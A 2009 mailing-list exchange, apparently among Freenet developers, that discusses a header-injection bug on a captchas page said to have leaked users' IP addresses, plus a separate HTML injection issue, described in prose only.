2009/1/20 Matthew Toseland <toad at amphibian.dyndns.org>: > On Monday 19 January 2009 19:42, Florent Daigni?re wrote: >> * Matthew Toseland <toad at amphibian.dyndns.org> [2009-01-19 13:02:31]: >> >> > There were at least: >> > - A lack of validation on the captchas page which enabled collecting users > IP >> > addresses. This involved putting newlines into the headers in order to > send >> > extra headers and in particular redirects, and was actively exploited by >> > nextgens to collect IP addresses. >> >> Unless you can prove it that's defamation ;) > > Then I retract it ... but I'm fairly sure this bug is exploitable, that's the > point. :)
Not sure if you are seeing the same problem. The only leak I am aware of is related to HTML injection, which is fixable with a few lines of code. (Which I have never tell SomeDude.... If you know any off-the-freenet way to send SomeDude message, please tell me........... for example: gpg-encrypted message posted on pastebin? ) Or do you means something HTTP Request Smuggling-like? --
